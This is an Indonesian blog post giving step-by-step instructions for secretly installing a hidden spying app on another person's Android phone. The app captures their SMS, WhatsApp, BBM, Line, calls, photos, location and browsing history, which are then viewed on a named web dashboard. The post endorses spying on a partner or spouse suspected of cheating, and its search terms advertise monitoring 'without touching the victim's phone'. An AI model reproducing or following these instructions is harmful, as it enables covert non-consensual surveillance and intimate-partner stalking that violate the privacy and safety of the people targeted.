Cara Menyadap Percakapan Telphone, WA,BBM,Line,SMS Di Android

Halo sahabat Tonjong Blog, Beberapa waktu yang lalu ane pernah share cara ampuh menyadap sms di kartu indosat dengan bantuan pihak operator indosat, nah pada kali ini ane akan berbagi pengalaman bagaimana cara menyadap telphone, WhatsApp, BBM, Line dan SMS semua operator Di HP Android dengan bantuan Aplikasi Gratis penyadap.

Sebelum dilanjutkan bagaimana cara bajak telphone,BBM,SMS,LINE.  ane memberitahukan bahwa kegiatan ini tidak baik karena menyangkut pribadi seseorang, namun jika memang hal ini perlu dilakukan dan sangat perlu dilakukan seperti contoh:  menyadap bbm dan wa pacar yang selingkuh, atau menyadap telphone suami dan istri yang dicurigai selingkuh hal ini boleh sobat lakukan selagi sobat siap menanggung segala akibatnya.

cara bajak dan sadap berbagai percakapan di ponsel android

Meskipun aplikasi ini pada dasarnya dapat menyadap percakapan bbm, sms, wa, telphone, line namun secara jelasnya aplikasi ini dapat menyadap hampir semua bentuk percakapan, baik  itu email, Facebook, Facebook Messenger, Viber, Line, KakaoTalk, WeChat, Skype messages, bahkan history browser yang dibuka pada ponsel target.


Cara Menyadap Percakapan Telphone, WA,BBM,Line,SMS Di Android


Berikut adalah tutorial cara menyadap berbagai percakapan dengan aplikasi pada android.

  • Download dan Aplikasi Penyadap pada link berikut ini
    Download Aplikasi Penyadap Berbagai Ponsel
  • Silahkan Instal pada ponsel target, Akan muncul peringatan pada ponsel, silahkan lanjut ke menu pengaturan instal dan centang pada menu sumber tidak diketahui (Unknow Sources) . perlu sobat ketahui hal ini wajar saja terjadi karena aplikasi yang di download bukan berasal dari playstore. silahkan lanjutkan instal sampai dengan selesai. 
  • Jika proses instal sudah selesai maka akan muncul tampilan seperti gambar diatas, silahkan sobat buat akun.
  • Setelah Akun dibuat selanjutnya tekan menu Active notification backup, dan pilih menu Notification Services dengan memberi tanda centang pada kotak yang tersedia.
  • Langkah terakhir pilih Save and Hide This App. 
  • Dengan menyelesaikan langkah diatas maka ponsel sudah berhasil disadap. 

Cara Mengecek Hasil Penyadapan

  • Silahkan buka https://smartphonelogs.net/ dan login menggunakan email dan username yang digunakan pada ponsel target tadi. 
  • Setelah masuk akan ada banyak menu yaitu : Text & call logs, Location, Photo, Notification, Browser. Masing-masing jenis menu ini menandakan jenis apa yang ingin dilihat. Jika ingin melihat foto dari percakapan chat, BBM , WhatsApp silakan masuk ke menu Photo, Jika ingin melihat percakpan tulisan BBM, WhatsApp dll silakan masuk ke menu Notification.
Semoga bermanfaat dan membantu sobat. 

Incoming Search Term: cara menyadap bbm gratis, cara menyadap bbm tanpa menyentuh hp korban, cara menyadap bbm orang lain tanpa meminjam hp nya, cara menyadap bbm tanpa aplikasi, sadap bbm lewat pin, cara menyadap bbm orang lain lewat internet, cara bajak bbm dari jauh, cara sadap bbm dengan dexrex. 


0 Response to "Cara Menyadap Percakapan Telphone, WA,BBM,Line,SMS Di Android"

Posting Komentar